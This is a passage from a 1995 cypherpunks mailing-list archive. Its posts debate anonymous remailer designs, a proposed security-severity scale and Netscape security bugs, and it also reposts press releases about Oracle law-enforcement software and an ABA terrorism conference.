that's his business, but people don't normally expect that you're a
spokesman for a company just because you work there.  Jeff even has,
like most of us, a disclaimer in his sig saying he doesn't speak for
the company.  Anyone that assumes otherwise is surely a newbie to the
net, and just like most bizarre assumptions that newbies make we'll
gently correct them, and they'll learn.

Patrick

p.s. was sameer's post a spam?  <snicker;>  Please don't take this line
     seriously, it was said with tongue definately in cheek.
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Travis Corcoran <tjic@OpenMarket.com>
Date: Wed, 18 Oct 95 09:55:59 PDT
To: cypherpunks@toad.com
Subject: Re: I want to learn!
Message-ID: <199510181655.MAA10669@cranmore.openmarket.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Message-Signature-Date: Wed Oct 18 12:55:39 1995


In article <199510181437.HAA00477@jobe.shell.portal.com> anonymous-remailer@shell.portal.com writes:

>  Date: Wed, 18 Oct 1995 07:37:30 -0700
>  
>  >>From: VINCENT810@aol.com
>  >>Can someone please show me the ropes on becomeing a cypherpunk!!!! Thanxs.
>  >     Me Too, I'm catching on but some help would help !
>  >     Leo_Martensen_at_~~HEID-DHS@ccmail.odedodea.edu
>  
>  Okay, places to start.
>  
>  Go to the cypherpunks ftp site ftp.csua.berkeley.edu/pub/cypherpunks
>  and look around.  TCMay's "Cyphernomicon" FAQ is a must, although
>  it's really really big.  It's been Weblinked somewhere, but I
>  fail to recall. 

relevant sites:

	Home:           ftp://ftp.csua.berkeley.edu/pub/cypherpunks/Home.html
	Archives:       http://www.hks.net/cpunks/index.html				  
	Cyphernomnicon: http://www.oberlin.edu/~brchkind/cyphernomicon/       


-----BEGIN PGP SIGNATURE-----
Version: 2.6
Comment: Auto-signed by mail-secure.el 1.006 using mailcrypt
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQCVAwUBMIUxjIJYfGX+MQb5AQGURQP/dLUUkrY8H5cHhP5T4K58R0u5yjpN8qWa
9eX64STHz+MEl7favlTWiGXcAZdI0lV6Z9UMdt1FWfo30DrJne1TK8Zm3e/BIzUQ
Vglxr7LbV4GckXIiM6zKXNIOlTipKTq6QLjLzS7n4Al2ElC8F1pPkAZNLUsrn4n5
95sbh0Cv2xg=
=5EjT
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Wed, 18 Oct 95 10:08:41 PDT
To: cypherpunks@toad.com
Subject: Re: Anonymity: A Modest Proposal
Message-ID: <Pine.3.89.9510181314.C103772-0100000@aix2>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 18 Oct 1995, Hal wrote:

> Modemac proposes sending messages to remailers via newsgroup postings.
> 
A fair amount of alt.test postings seem to be pgp'd (though a lot were
Detweiler Blacknet tentacles, not that I've checked since Tim's Blacknet key 
was factored ). There was also an alt.anonymous.messages or something 
along those lines. Bad propagation.

It seems to me that receiving messages through newsgroups (sent through 
remailernet) and having them retrieved automatically by your newsreader
might be a better method of defeating traffic analysis. Sounds like Vinge's
piece in True Names about downloading the entire world bbs. All you'd need
to do here would be to scan your local feed of alt.test .

While this would work in the short run, with a low level of users, in a 
high usage scenario, you'd post a destinated pseudonym (you might want it 
encrypted) in alt.test along with the name of the specific newsgroup the 
actual message would be posted to. Saves computing power.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Tue, 17 Oct 95 20:17:05 PDT
To: vznuri@netcom.com (Vladimir Z. Nuri)
Subject: Re: proposal: "security spectrum scale" (SSS)
In-Reply-To: <199510131841.LAA17086@netcom9.netcom.com>
Message-ID: <199510180313.NAA26276@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello,

"Vladimir Z. Nuri" <vznuri@netcom.com> wrote:

...
> to aid this serious problem, I propose the creation of a 
> UNIFIED SECURITY SPECTRUM RANKING.

Good idea - if you can pull it off. If you can't, you will create
even more confusion. That is a decision only your conscience can make.

> this would be a list of all the different types of security weaknesses
> a system can have, and their LEVEL OF SEVERITY. it would attempt to 
> rank every type of security breach possible. then, when a new
> security weakness is discovered, it could be ranked A1 or B5 or C6
...

I wouldn't use <letter><number> because that could be confused with
Orange Book security ratings. The RISKS are obvious, as they say.

...
> another idea behind the rating: it might be a sort of matrix format,
> such as "a-6-alpha" where each of the elements indicates some kind
> of independent factor. for example the "a" might mean "client side",
...

If you want multi-axis, perhaps something like the Geek code, except
standardized so that severity is apparent even if you don't remember
the letters?

(Eg in the Geek Code "+" is usually good but many people wouldn't look
well on d++ or w+++++ (conservative dress and Bill Gates resp.). You
would want "+" to always be good, for example.)

You also want it fairly short (media) - alternatively make it so that
it is possible to say (eg) "A2" or "A2+dx/g8/b*" depending on how much
detail you want (column space).

...
> I don't really consider myself the best 
> qualified in terms of experience but sometimes if you want something done, you
> have to do it yourself.

A.k.a. "cypherpunks write code".

...
> another neat perq: if the cypherpunks come up with a good scale, it
> could be a tremendous positive publicity tool. "today experts discovered
> a bug in -x- that rated a -y- on the CSSS (Cypherpunk Security Spectrum Scale)"

What's wrong with "a bug in -x- that rated -y- on the Cypherpunk Scale"?
There's already TDM TLAs (that's "too damn many three letter acronyms").


Then williams@va.arca.com (Jeff Williams) responded:
...
> Unfortunately, severity is a question of perspective.  In some
> environments, an operating system crash could be considered catastrophic.
> In others, it just means reboot and continue.  I'm not a policy wonk,
> but security is relative to what you care about.

That doesn't rule out a scale: it merely changes how you perceive the
scale.

An earthquake 3.6 on the Richter scale would be no problem if you are
playing poker, say, but "catastrophic" if you are playing mikado.

It also depends on the "Operating System" (building) you are in.

> > to aid this serious problem, I propose the creation of a 
> > UNIFIED SECURITY SPECTRUM RANKING.
> 
> There already was a USSR, but I think it ultimately failed :-}

I wouldn't exactly say Soyuz failed; I'd say the main problem was that
they got a leader with a conscience... And you can't have a totalitarian
dictator with a conscience (as you can see).

...
> > bug that was recently discovered (say, the recent netscape bugs)
> > was, say, not really as potentially severe as the Morris worm.
> 
> To whom?

I would suspect the best answer is "to the general public" or "to the
average user".

If you are not an average user, you reinterpret the rankings to your
liking, making sure that you get more information on those that are
potentially severe to you. It'll still help you by giving you a 
preliminary ranking.

...
> The only way to unify security rankings is to constrain the problem by
> assuming an environment and intended uses for the system.  It sounds
> like you are assuming a low assurance workstation with an internet
> connection which is used for non-critical home or business purposes.

No, that is not necessary. Just like you can say an earthquake measures
3.6 on the Richter scale without making any statements about whether
or not it is "severe".

...
> Any flaw rating system needs to consider how it will deal with advancing
> protection technology.  For example, susceptability to viruses is much less
...

Not really, you don't need to change the Richter scale just because
buildings have got more solid. The perception of the scale needs to
change, but not the scale itself.

> Also, how do you rate situations where flaws are combined to mount an attack?
...

Then you are asking not for a rating of individual bugs, but overall
bugginess of a product. That can be rated on the same scale or a different
one, but it is a different question.

("A bug discovered in -x- rating -y-, raising the overall bugginess
or -x- to -z-. Film at 10.9959268374")

Then "Vladimir Z. Nuri" <vznuri@netcom.com> responded:
...
> the security rating would not be particularly useful to security experts,
> other than giving a rough idea of the potential severity of the problem.
...

Yup, or if you have long and short versions the long could actually
contain some more useful info.

...
> if something is not done to help convey accurate information,
> a void occurs and potentially "urban myths" 
> such as "the internet steals your credit cards" would tend to 
...

Do we *mind*? "The internet steals your credit cards - download Magic
Money!" :-)


OK, I guess we do mind.

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMIRw5SxV6mvvBgf5AQF/iQQAory7PrJ2sJ1FXSOmXbwju5UHGbOjIMJV
CxWD7yPdAooz7ou8JImjky2c558YRxuY+cEXyCvOkTUzgtHwrwCY4IYI/U6e44fw
a9En7faSYG5eqOldpeSyuGqbC8DqEhuHAZiReFUHAduZw+fy7Oq9XNbWGZe20ZEN
I4Hsw6AvvRA=
=WTgn
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arley Carter <ac@hawk.twinds.com>
Date: Wed, 18 Oct 95 10:27:17 PDT
To: Patrick Horgan <patrick@Verity.COM>
Subject: Re: Digital Signature Guidelines
In-Reply-To: <30852451.45E4@verity.com>
Message-ID: <Pine.HPP.3.91.951018131857.28279B-100000@hawk.twinds.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 18 Oct 1995, Patrick Horgan wrote:

> It seems that your embedded viewer doesn't want to work on my
> UNIX box.  It makes it quite hard to comment on your
> guidlines.  Apparently, from the way you're presenting this you
> have no real desire to get any industry consensus.  Perhaps you
> only want people that use Windows to have an oportunity to comment.
> Mac users and Unix users not welcome.  I find the whole need to 
> have yet another viewer annoying.  Haven't you guys heard of 
> industry standards?
> 
I had the same annoying experience.  But then I remembered. It's supposed
be that way. They're $%#*& lawyers. :-(  A Pox on their proposal!


I'd tell you the one about the dead snake and the dead lawyer in the 
middle of the road, but you've probably already heard it. ;-)

Also Annoyed,

-arc
Arley Carter
Tradewinds Technologies, Inc
email: ac@hawk.twinds.com
www: http://www.twinds.com 

"Trust me. This is a secure product. I'm from <insert your favorite 
corporation or government agency>."

 > Annoyed,
> 
> Patrick J. Horgan
> -- 
>    _______________________________________________________________________
>   /  These opinions are mine, and not Verity's (except by coincidence;).  \
>  |                                                       (\                |
>  |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
>  |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
>  |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
>  |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
>   \___________________________________________________________\)__________/
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kelso@netcom.com (kelso)
Date: Wed, 18 Oct 95 18:54:13 PDT
To: cypherpunks@toad.com
Subject: Re: Anonymity: A Modest Proposal
Message-ID: <199510182035.NAA28382@netcom22.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

One method to take the heat off of the last remailer
in a chain would be to call on our friend the "one
time pad".  A message is split into two equal parts
that only make sense when the two parts are 'xor'ed
together.  The seperate parts are then sent through
different paths to the final recepiant (or newsgroup).
The reader would have to 'xor' the parts together in
order to read the message.  The remailer could not be
blamed (as the message was unreadable to him).

The drawback is that the message would be unreadable
until both pieces showed up.

This method could also be expanded with two more equal
parts that transform the origional two parts into
two different messages unrelated to the origional
message.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "J. R. Valverde (EMBL Outstation: the EBI)" <txomsy@ebi.ac.uk>
Date: Wed, 18 Oct 95 05:43:06 PDT
To: cypherpunks@toad.com
Subject: Re: Postscript in Netscape
In-Reply-To: <9510181156.AA11525@all.net>
Message-ID: <199510181242.NAA26611@neptune.ebi.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


>WRONG!!! Netscape claims to be "secure" - hence it is Netscape's job to
>be secure - regardless of the user's use of their product.  Otherwise,
>the ads should read:
>
	By that rule, it should instead say: "Netscape is only secure if
"you use it in a physically secure computer, only accessible to the person
"using it, with an absolutely secure OS, configured for maximum security,
"totally bug-free, using a network connection that only spans trusted hosts
"with absolute security levels at least as astringent as that of origin,
"that can in no way whatsoever be tapped of otherwise tampered with,
"and to which only persons of abosulte trust (if that thing exists) for
"the original user have access. And that only if God doesn't decide to
"make a miracle to break the security or a quantic effect doesn't suddenly
"materialize some kind of horrible and unknown monster from another dimension
"with evil intentions against that specific user of Netscape and power
"enough to break his/her tight security ring! Oh, and provided the user doesn't
"suddenly become mad and etc, etc, etc..." You could go on forever.

	Look, the truth is that no matter how you put it, there is always
a weakest link which is the human factor. The most you can say is that any
method -cryptographic or not- is as secure as the weakest link in the whole
environment in which it is used.

	That stated, the farther you can go is to guarantee only the security
of *your* crypto -or whatever- method and only as far as commonly accepted
wisdom and knowledge allow you to do so. You can't be sure there is no
one there who knows how to factor big numbers, and is keeping silent and
becoming very reach breaking into other people information.

	I think it is fair if anybody says that their product -or crypto-
method, considered isolatedly, has a given level of "accepted" strength. With
that in their hand any minimally intelligent user should be able to evaluate
the security of his/her own setup given all the -infinite- things that can
go wrong and his/her prsonal trust on mankind.

	Otherwise it would be like asking car makers to give you a detailed
listing of the relative resistance of all the materials in the car against
any possible other matter in the Universe into which you could possibly
crash. Imagine it: The new XXXX is safe to drive as long as you don't crash
into a truck, concrete wall, jump over a cliff, submerge into deep ocean,
or a nuclear bomb doesn't explode over your head...!

				jr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Wed, 18 Oct 95 11:11:00 PDT
To: cypherpunks@toad.com
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <Pine.3.89.9510181314.C103772-0100000@aix2>
Message-ID: <Pine.3.89.9510181440.A93842-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 18 Oct 1995 I wrote:

> It seems to me that receiving messages through newsgroups (sent through 
> remailernet) and having them retrieved automatically by your newsreader
> might be a better method of defeating traffic analysis. Sounds like Vinge's

Nah. I'll take it back. Send encrypted through usenet, receive 
encrypted through usenet. Best of both, but very slow and only good for 
voluntary mail reception. You could also have an agent doing this 
scanning for msgs and posting unencrypted (or send mail to an  
unwitting spam victim). While it protects all but the last mailer almost 
completely, it's far slower than remailernet and only protects against 
traffic analysis.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blob@apple.com (Brian Bechtel)
Date: Wed, 18 Oct 95 14:17:05 PDT
To: Chris Claborne <cypherpunks@toad.com
Subject: Re: Tales from Tech Support
Message-ID: <v02130501acab1ec2cb11@[17.255.31.80]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:24 PM 10/18/95, Chris Claborne wrote:
>This is just one of the incredible "Tales from Tech Support" you can find on
>web page:
>http://128.218.7.140/auricular/homepage/tstales/tstales7.html
[...]
>Some poor SuperMac TechSport got a call from some middle level
>official...from the legitimate government of Trinidad.

[long story deleted]

Nice story, but the Republic of Trinidad and Tobago haven't had a coup since
1990, and that coup attempt was unsuccessful.  There was some tension in
Trinidad and Tobago last summer due to the speaker of the house refusing to
step down over some parlimentary issues, but it hasn't escalated into a
coup (yet).

If this happened, it happened in 1990.  But even then, the legitimate
government didn't fall.  Several key buildings were occupied by rebels for
a couple of weeks, and then the rebels surrendered and were pardoned to
great public outrage.

--Brian Bechtel, who shouldn't know so much about the Caribbean...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Wed, 18 Oct 95 11:16:26 PDT
To: "Willis H. Ware" <willis@rand.org>
Subject: Re: YOUR chat with Goeff Greiveldinger
In-Reply-To: <199510181703.KAA29941@conrad.rand.org>
Message-ID: <Pine.SUN.3.91.951018141541.15625D@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Thank you for the thoughtful note.  I will indeed adjust my semantics to 
make the distinctions you suggest, for I agree that they are important.  
At this writing, I don't know exactly what words I will use, but I will 
strive to make the distinction clear.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's hot here.  And humid.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Tue, 17 Oct 95 21:19:35 PDT
To: jps@monad.semcor.com (Jack P. Starrantino)
Subject: Re: responce to graphic encryption replies
In-Reply-To: <9510140243.AA06608@monad.semcor.com>
Message-ID: <199510180418.OAA26577@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello jps@monad.semcor.com (Jack P. Starrantino)
  and cypherpunks@toad.com
 
JPS wrote:
> > ... The graphic file is going to have a highly correlated 
> > structure, long runs of white space etc. 
> 
> This is not the case for digital imagery. For any given band, if you
> sample a significant portion of the image it would not be surprising to
> see a more or less random distribution over the range.

Even for a picture (as opposed to text fax) you have correlation.
If you do not, you cannot compress it (losslessly).

In general you would want to find the key which leads to least entropy
(ie most compressible file). In other words, find key with minimum
I(key) + I(ciphertext decrypted-by key).

> > The statistics for such a file 
> > would be different than the random distribution you'd get from using the 
> > wrong key. 
> 
> If you decrypt with the wrong key, do you get a random distribution?

Given security thru obscurity, who knows?

> Would this be the case for all wrong keys? Would the statistics change

Given security thru obscurity, who knows?

> in any discernible pattern as the keys got "closer"?

Given security thru obscurity, who knows?

> > Even if the graphics format is compressed, leading to a more 
> > even distribution, ...

That cannot be so: once it is compressed, you can't encrypt it as a
picture, you have to encrypt it as a bitstream.

...
> You could also try throwing an edge detector or some other morphological
> recognizer at the output. It would still be cheaper than having to a man
> in the loop, but you're going to spend a lot of cpu time.

Much easier than OCR.


Going back to compressing images now... HINT anyone?

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMISADSxV6mvvBgf5AQGyYwQAtzUvNgQm6PfHPItqlKcqQv/J9hCduk9W
JQ8uuUN3424hN5puQ53LCcbB/PzkG4ESghu9GvOeFeljd7TBUsdXbZe9twXCbot7
4YZE3mHsyzcZeEnrGjsWXOj/K9GLkGaEWYLdSLYRM6u20mX4jv60VZ4bRT89zSMW
cJyT6776b44=
=N2+O
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eli Brandt <eli@UX3.SP.CS.CMU.EDU>
Date: Wed, 18 Oct 95 11:19:42 PDT
To: cypherpunks@toad.com
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <199510181636.JAA17879@jobe.shell.portal.com>
Message-ID: <9510181819.AA09097@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Hal said:
> I think splitting the message would be OK, but then the question is who
> is responsible for reassembling it?  If there were a "reassembly
> server" which took such messages, assembled them, and forwarded them,
> then we would be right back where we started from.  If the end user is
> responsible for reassembly, then that is tantamount to voluntarily
> agreeing to receive anonymous messages, and that is no problem.

I was thinking that the recipient would be responsible -- otherwise,
there's not much point.  Yes, this is particularly awkward for news.
Also, the sender would probably have to do the splitting, to avoid
presenting any remailer with the whole message.

Is there really "no problem" if the recipient does the merging?  If
Child Terrorist A is communicating with Child Terrorist B, law
enforcement is going to be unhappy.  I imagine you don't get too many
complaints about that, but it's part of the political argument against
remailers.  

--
   Eli Brandt
   eli+@cs.cmu.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Wed, 18 Oct 95 11:27:05 PDT
To: cypherpunks@toad.com
Subject: This PROMISes to be odius
Message-ID: <Pine.SOL.3.91.951018141754.20570A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain



PR   10/18 0809  ORACLE INTRODUCES SOFTWARE TOOL FOR LAW ENFORCEMENT 

Tool Helps Federal, State, Municipal Agencies Stop the Criminal Element

      Enables Agencies and Departments To Build Data Warehouses of
         Intelligence To Better Manage, Analyze and Solve Cases

    MIAMI, Oct. 18 /PRNewswire/ -- Oracle Corp. (Nasdaq: ORCL), the world's
leading information management software company, today announced immediate
availability of Oracle Special Investigative Unit Support System (SIUSS)
Release 1.0, a Microsoft Windows-based software tool designed to help law
enforcement investigators more effectively manage and solve cases.  Oracle
SIUSS uses Oracle's industry leading information management technology to yield
new insights into criminal activity and significantly reduce the time needed to
bring cases to their successful resolution.  The software was introduced at the
International Association of Chiefs of Police Conference in Miami, FL.
    
     Oracle SIUSS represents a major step forward in the collection, storage
and analysis of case intelligence information for complex conspiracies, violent
crimes such as rape and murder, drug trafficking, and other major cases.

     The tool combines traditional analytical concepts with job-specific
information collection and lead generation analysis features.  For example,
Oracle SIUSS receives input from various investigative sources -- a
surveillance team, forensics expert, wire room operator, citizen tip -- and
makes the data available to agency management, analysts and investigators in
the form of leads on their cases.

     Oracle SIUSS offers advanced capabilities beyond traditional law
enforcement systems which simply gather and store factual information such as
name, birthdate, or time of a call.  Oracle SIUSS develops leads the way a real
investigator works, by starting with known facts and combining them in a way
that generates further insight and leads.

     Built upon Oracle7, the most popular relational database management system
in use by U.S. law enforcement personnel, Oracle SIUSS allows investigators to
uncover crucial criminal patterns by linking subjects, vehicles, locations,
businesses and other entities, within a case or among several cases.  Designed
in cooperation with federal, state, military and municipal investigators
working on real cases, Oracle SIUSS manages a comprehensive array of
investigative intelligence, including telephone information (toll, pen/DNR,
Title III), assets, financial data, arrests, seizures, credit card data,
surveillance, mail covers, trash pickup, and incidents.  Because Oracle SIUSS
is able to store information from multiple cases in a single database,
information can be cross referenced to uncover obscure relationships.  Oracle
SIUSS also helps the investigator build and document case information as it
moves towards prosecution.

     "Oracle has a long history of partnership with law enforcement," said Jay
Nussbaum, senior vice president and general manager, Oracle Government. 
"Oracle software is the foundation of important programs within the FBI, INS,
Department of Justice, Customs, ATF, New Mexico Dept. of Public Safety, and
many other agencies at the federal, state, and local level.  We are proud to
introduce Oracle SIUSS to the law enforcement community, a tool designed with a
specific capability in mind -- stopping the criminal element."

    Capturing Data to Capture Criminals
    
    With Oracle SIUSS, Oracle for the first time delivers a commercial-
off-the-shelf software tool that layers the features and functionality
investigators require on top of industry-standard information management
technology.  The Oracle7 architecture provides a secure, flexible, easy- to-use
and administer environment in which law enforcement systems, including Oracle
SIUSS, can be incorporated.  Case information can be shared or kept separate to
any degree desired depending on the needs of the investigators.
    
     Through the course of an investigation, information shows up in hundreds
of bits and pieces at different times and places.  With Oracle SIUSS, once this
data is captured, the odds that it will be lost or overlooked are significantly
reduced.  Using Oracle SIUSS's automated link analysis, the time it takes to
generate and chase down leads is reduced by 20 to 100 percent.
   
     The law enforcement community as a whole benefits by this combination of
functionality and information management technology. Large agencies and small
departments alike can standardize on one underlying architecture for all of
their information processing needs. Concerns such as connectivity, security,
and portability, are now non- issues.  The net result is a significantly
enhanced investigative capability integrated into the overall law enforcement
operation.

     Oracle SIUSS uses a sophisticated pattern analysis process for analyzing
the timing and sequence of phone calls made by the target. This gives insight
into how the target and his associates work together within a possible
conspiracy.  For example, Oracle SIUSS generates a conspiracy index based upon
the relationship of calls made by the target to a set of phone numbers, which
reveals the degree of probability that the subscriber for a phone number is
involved in the conspiracy.

     Joint investigative operations between agencies or departments are
possible, if authorized, ensuring a high degree of control over what
information is available to which individual, department, or agency. Oracle's
secure database, networking, and encryption technologies control the flow and
accessibility of intelligence data outside the supplying agency.
     
     A typical Oracle SIUSS configuration consists of Windows PCs connected to
virtually any type of file server.  The price starts at $6,900, which includes
the Oracle7 database.  For more information about Oracle SIUSS, please call
(301) 633-0584, Ext. 7192.

     Oracle Corp., a $3 billion company, is the world's largest supplier of
software for information management, and the world's second largest software
company.  The company offers its database, tools and application products along
with related consulting, education and support services, in more than 90
countries around the world.

     For more information about Oracle, please call (415) 506-4000. Oracle's
World Wide Web address is http://www.oracle.com/.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Wed, 18 Oct 95 11:31:30 PDT
To: cypherpunks@toad.com
Subject: Oh to be a mouse in the corner...
Message-ID: <Pine.SOL.3.91.951018142342.20665B-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


PR   10/17 1720  ABA: TERRORISM EXPERTS TO SPEAK

    Why is domestic terrorism on the increase?  How serious a problem is it? 
Do we have international terrorism under control?  These and other questions
will be the focus of a two-day conference sponsored by the ABA Standing
Committee on Law and National Security at the Hotel Washington in Washington
D.C., October 19 and 20.
    The conference, entitled "National Security Law in a Changing World: The
Fifth Annual Review of the Field," features experts in the field of terrorism,
including former CIA Director William Colby, former FBI Director William
Sessions, and Oklahoma Governor Frank Keating, whose state was the site of the
worst domestic terrorist attack in U.S. history.

    Program highlights include:

    "The Press and National Security," 10:30 a.m. Thurs., Oct. 19

    Panelists:  Timothy Weiner, New York Times; Peter Rodman, National
     Review; Carl Robert Zelnick, ABC-TV; and Carl Stern, Department of
     Justice.


    "Reinventing the Intelligence Community," 2 p.m., Thurs., Oct. 19

    Panelists:  William Colby, Former Director of the Central
    Intelligence Agency; William Sessions, Former Director of the
    Federal Bureau of Investigation; and Admiral William Studeman,
    Former Acting Director of CIA.

    "Addressing the Threat of Domestic Terrorism," 8:30 a.m., Fri.,
    Oct. 20

     Panelists: Bradley Buckles, Bureau of Alcohol, Tobacco and
     Firearms; Howard Shapiro, General Counsel FBI; and Professor
     Stephen Sloan, University of Oklahoma.

    Luncheon Address, 12 p.m., Fri., October 20

    Speaker: The Honorable Frank Keating, Governor of Oklahoma

    All Conference events will take place in the Ballroom, Lower Lobby Level at
The Hotel Washington, 15th St. and Pennsylvania Ave., Washington D.C. For a
complete listing of conference programs, please call Holly McMahon at
202-662-1036.

    CONTACT:  Christine Lanier of the American Bar Association, 202-662-1792,
or
E-Mail:  clanier@@attmail.com.
    -0-                 10/17/95




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Wed, 18 Oct 95 14:28:53 PDT
To: cypherpunks@toad.com
Subject: perl-RSA CJ request sent today
Message-ID: <199510182128.OAA00218@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


A number of people have been asking me whether I've gotten any
response from the CJR yet. Well, I only sent it off today, because
I've been so busy.

I sent the main one priority mail, so I suppose the clock can be
considered to have started ticking on the 20th, just in case anybody
is keeping track.

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Martin Diehl" <mdiehl@dttus.com>
Date: Wed, 18 Oct 95 13:20:05 PDT
To: cypherpunks@toad.com
Subject: Media Accuracy
Message-ID: <9509188140.AA814053942@cc1.dttus.com>
MIME-Version: 1.0
Content-Type: text/plain


     In the October 16, 1995 issue of PC Week, Spencer F. Katt writes:
     
     >Isn't it ironic?  Andreessen creates the WEB while in college; now 
     >college students are finding all the holes in it.  Two students have 
     >uncovered a serious bug in Netscape Navigator, one Katt source 
     >contends.  The browser has a 2K-byte buffer for reading HTML 
     >documents.  Well, these tipsters found that once the page has sent 
     >more than 2K, any assembly code in the HTML document will be 
     >executed.  As an experiment, these kids set up a simple Web server 
     >with some assembly code embedded in the HTML page to overwrite the 
     >client computer's FAT table [sic].  Sure enough, it worked.
     
     >spencer@pcweek.ziff.com
     
     He might be talking about the (already fixed) bug that allowed an HREF 
     that is longer than 356 bytes to overwrite the stack.  Hadn't heard 
     here that anything would happen other than getting Netscape to crash.  
     No names or URL's were given in the story.  Maybe he needs an update.
     Maybe we need an update.
     
     Martin G. Diehl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (t byfield)
Date: Wed, 18 Oct 95 11:47:26 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: Anonymity: A Modest Proposal
Message-ID: <v02120d00acaabce496b3@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 9:42 AM 10/18/95, Hal wrote:

>I think a remailer which forged headers would get people even angrier
>than one which was up front about what it was doing.  Forging headers is
>really considered antisocial by a lot of people on the net.  If you could
>do it safely, you wouldn't need remailers.  Since you need them, it's not
>safe, hence the message will probably get traced back to the remailer.
>This is prima facie evidence to get an account yanked at a lot of places.

        Of course. The problem is that protocols as implemented permit
header-forging: it's a practical fact of the net, and one that maybe
shouldn't be overlooked on (basically vague) 'moral' grounds, any more than
Netscape should say, "Well, you just _shouldn't_ screw someone with a
foo.foo.foo.foo... URL." Of course people shouldn't overflow your stack
intentionally--but they _can_, and the implications of that fact are
shaping the net as we speak. If the headers were forged in such a way as to
falsely and _credibly_ attribute a transmission to an actual uninvolved
third-party, that's one thing; but the existence of headers that are forged
so incompetently as to be traceable to their actual origin suggests that
forged headers might be worth meditating on. For example, what if two or
three dozen independently maintained Mixmasters in three or four countries
randomly forged headers (maybe even actually badly, or maybe craftily
"badly") so as to make the last link in a chain look like one (or "one") of
the other remailers; how would the Co$ cope with that?
        Anyway, you get the drift.


Ted






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Marner <dmarner@mis.nu.edu>
Date: Wed, 18 Oct 95 14:51:43 PDT
To: anonymous-remailer@shell.portal.com
Subject: [NOISE] Re: Netscape rewards are an insult
In-Reply-To: <199510181839.LAA07648@jobe.shell.portal.com>
Message-ID: <199510182151.VAA05589@mis.nu.edu>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 18 Oct 1995 11:39:49 -0700  some Anonymized cretin wrote:

>Mr, Weinstein:
>
>Is your comment about the "Bugs Bounty" program an official comment, that
>you have "no idea how valuable" it will be??  Shall I give you a clue,
>as to how valuable the discovery of a flawed algorithm might be??
>

... and so on ...

Alice, 
   Could you please flag your messages with "[POINTLESS WORDY OFF-TOPIC FLAME]"
in the subject line from now on? Since you are going through a
